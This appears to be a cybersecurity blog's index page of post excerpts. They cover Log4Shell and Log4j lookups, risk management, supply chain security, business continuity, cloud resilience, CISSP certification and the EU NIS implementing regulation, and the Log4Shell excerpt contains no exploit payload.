Log4Shell: Apache Log4j 2 CVE-2021-44228

If you haven’t been living under a rock for the past few hours, you’ll know that last Friday a critical vulnerability in the Log4j 2 package, a massively used Java log library, started to go viral.

This vulnerability, dubbed Log4Shell and discovered by Chen Zhaojun (software engineer at Alibaba), has been assigned the CVE CVE-2021-4428, with a CVSS of 10.0.

Although by now there is tons of public information about it, let’s give a few hints about it.

The actors

Log4j 2: the Lookup plugin

As we have already mentioned, Log4j 2 is a log library for Java applications used by developers to log application information. Using it is as simple as including something like log.debug(“Test message”); in the code, which will generate a log entry. Often, the information that is logged is related to the application itself and its execution context.

One of the capabilities of the library, called Lookups, is the ability to use variables when writing to the log, which will be replaced by the corresponding value, with a specific syntax: ${variable}. For example, if we use ${java:runtime}, when the application logs, it will record the Java runtime version.

[Read more…]

De-constructing risk management (I): the inherent risk

Living beings are experts at managing risks. It’s something we have done over millions of years. It’s called, among other things, survival instinct. We wouldn’t be here if we were bad at it.

We avoid them, we mitigate them, we externalize them, we take them on.

For example, is it going to rain today? If it rains, how much is it going to rain? Do I take my umbrella? Do I stay home? Will I run into a traffic jam on the way to work? Will I be late for the meeting? Do I call to let you know? Do I try to postpone the meeting? Will I puncture a tire on the way home? When was the last time I checked the spare tire? Have I paid the insurance premium? What is the roadside assistance coverage?

All these everyday processes of risk identification and risk assessment are carried out unconsciously all the time, and we apply risk management measures without even realizing it. We grab an umbrella, call the office to inform them of a delay, attend the meeting by phone, leave home earlier or decide to take public transport. Obviously, it’s not always that easy.

However, when we move to the corporate environment, we start with risk tolerance, probability, impact and vulnerability criteria, threat catalogs (standard), strategies, risk registers, inherent, residual and projected risk, mitigation ratios. And we get lost for months in concepts, documents and methodologies, moving further and further away from the reality we have to analyze and protect.

The orthodoxy of (cybersecurity) risk management

As a result of this, a few months ago, in the middle of the pandemic, I came across an interesting article that contrasted two very different visions of risk management, which it called RM1 vs RM2.

Basically, and quoting directly from the article, RM1 would be focused on “risk management for external stakeholders (Board, auditors, regulators, government, credit rating agencies, insurance companies and banks)“, while RM2 would be “risk management for decision makers within the company“.

A few weeks or months later, Román Ramírez published an entry in a similar vein, criticizing the prevailing orthodoxy in cybersecurity risk management and the problems it generated.

[Read more…]

The supply chain and the elephant in the room

A few days ago, in the wake of ransomware attacks “related” to the Kaseya remote IT management product, I posted on LinkedIn a short post in which I said the following:

Supply chain is the elephant in the room and we need to talk more about it.

Yes, let’s talk a little bit about prevention and leave detection and management for another time. As the saying goes, better safe than sorry. To develop it a bit further, I added that:

 

we should start thinking that third-party software and hardware are insecure by default and that an obligation should be imposed on software manufacturers to perform and publish, to some extent, serious, regular, in-depth pentesting for the critical applications they sell (and their updates). And even then, any third-party software or device should be considered insecure by default, unless proven otherwise.

 

In a comment, Andrew (David) Worley referred to SOC 2 reports, which should be able to minimally prevent these kinds of “problems”, and commented on a couple of initiatives I was unaware of: the Software Bill of Materials (SBoMs) and the Digital Bill of Materials (DBoMs).

I promise to talk about it in another post, but for now let’s move on.

[Read more…]

Enterprise immortality?

Too long ago I spent about a year at the Georgia Institute of Technology in Atlanta, continuing my university studies. Shortly after arriving, the person who was in charge of campus security gave us a talk in which he congratulated us on the fact that Atlanta was no longer the most dangerous city in the USA, but the second most dangerous (we are talking about 1999). He also warned, with emphasis on the younger ones, to be careful with the illusions of immortality typical of teenagers, to avoid unnecessary risks and to adopt certain safety measures.

I have a feeling that this kind of illusion applies quite adequately to many companies. In general, the thinking that still prevails in many organizations is the familiar one: it can’t happen to us. The equivalent is the one who gets in the car thinking that accidents happen to everyone but him and ignores seat belts and any “reasonable” speed limit.

[Read more…]

Business continuity: things to consider

Let’s continue with business continuity. Today I would like to review some points to be taken into account during the implementation of a Business Continuity Plan, which I consider essential to achieve a successful outcome:

1. The scope.

2. Senior management support

3. Investment

4. Setting the objective recovery times.

And with this extremely short introduction, let’s go into the matter.

1. The scope

The first aspect that we must take into account is the scope of our Business Continuity Plan (BCP), in two different areas. On the one hand, in an horizontal sense, it is necessary to clearly define which services, activities or processes are going to be included in the BCP, if we also intend to certify the management system in ISO 22301 standard. Although from a BCP’s usefulness point of view the most logical thing is to include the entire organization, especially in small companies where the infrastructure is shared for all the organization, it is also possible to choose a reduced scope that covers relatively independent elements (a local branch or the company’s headquarters, for example), or simply include those processes that are known beforehand to be the most critical for the organization’s continuity, such as production or logistics in a more industrial company, or the web portal in a purely e-commerce company.

[Read more…]

Cloud meets business continuity

Following the introductory cloud post a few days ago, and to avoid losing momentum, we are going to keep talking about the cloud, in an area where it seems particularly useful: business continuity. Along with other measures, it is clear that the existence of globally distributed datacenters (did someone say GDPR?), flexible system scaling and almost instantaneous deployment make a cloud infrastructure (on equal terms) more resilient to outages than an on-premise infrastructure. Of course, availability is not the only factor to consider, but we’ll talk about that another day.

However, to speak of the benefits of the cloud, the providers do themselves a pretty good job. What I want to talk about is some of the issues that must be considered before migrating an infrastructure to the cloud (although some of these points are also applicable to PaaS and SaaS). That is: the problems.

[Read more…]

The fight for privacy

The post, next week.

Own text. Original comic strip by RaphComic. Modified with permission.

CISSP certificate – II. Personal experience

In yesterday’s post we saw some general aspects of CISSP certification, which can be expanded consulting the official website of (ISC)2. In this post I will go into detail on the non-formal aspects, such as materials, advice and personal opinions. Let’s get started.

Is the exam difficult?

If you search on Google, the main user communities related to (ISC)2 are found on reddit and in the (ISC)2 forums. In both there are multiple entries relating opinions, experience with the exam, asking and giving advice, reviewing study materials and other topics. However, my impression is that the tone tends to be negative and somewhat frightening, terrifying even at times. Many people who have taken the exam describe it as very difficult and obscure with tricky wording. In addition, there are no “example” questions on the Internet, and the people who produce the training material (including the official question book) or teach the training courses (bootcamps) are never the same people who write the exam questions. Therefore, a critical element to manage during exam preparation is uncertainty.

[Read more…]

CISSP certificate – I

A few years ago (2011), our colleague José Luis Villalón told us about the (ISC)2 CISSP certification. As things have changed somewhat since then, and taking advantage of the fact that I recently passed the exam, we are going to take a look at this certification, the changes it has undergone and (in the next post) some advice that has personally helped me to pass the exam.

Introduction

The CISSP (Certified Information Systems Security Professional) certification of (ISC)2 is currently one of the main (basic to me, although that depends on your experience and background) certifications in the field of information security, although it is more widespread in the USA than in other countries, if we take a look at the number of certificates per country. While on 31 December 2018 the US had around 84500 certificates, between Germany (2100), France (1000), Italy (400) and Spain (650) barely reach to 4000 certifications. This is probably due to the fact that many Human Resources departments in the US consider CISSP to be a basic prerequisite in the field of cybersecurity, in addition to the significant greater acceptance that (ISC)2 certificates have in the US market.

[Read more…]

Publication of the NIS Implementation Regulation (for digital service providers)

(This entry has been prepared in collaboration with Ana Marzo, from Equipo Marzo, which provided a good part of the information).

Just a couple of weeks ago Ana March, from Equipo Marzo, an attorney for whom I have great professional respect, contacted me to tell me about the publication, not expected (at least by me), of a new regulation of the Commission related to the NIS Directive, which I have called in a display of originality NIS implementation regulation.

In fact, on 30 January, the Implementing Regulation (EU) 2018/151 of the Commission from 30 January 2018 was published, laying down rules for the application of the Directive (EU) 2016/1148 of the European Parliament and of the Council with regard to the specification of the elements to be taken into account by digital service providers in order to manage the existing risks for the security of networks and information systems, as well as the parameters for determining whether an incident has a significant impact..

At least it caught me by surprise (and I am sure that some of our readers will see the same thing), since I expected a transposition of the directive, not a regulation emanating directly from the Commission (which does not mean, of course, that we will not enjoy our own NIS-compliant legislation, as the legislator must be kept busy…). Given that, although in different areas, we had both coincided at the same client that fitted into the concept of digital services provider and could therefore be affected, we asked ourselves about the applicability of the regulation to this specific client. For example, is an online newspaper affected? And an online sales website? An online bingo? And the purchase-sale between individuals? Deriving the answer to these questions is the subject of this entry.
[Read more…]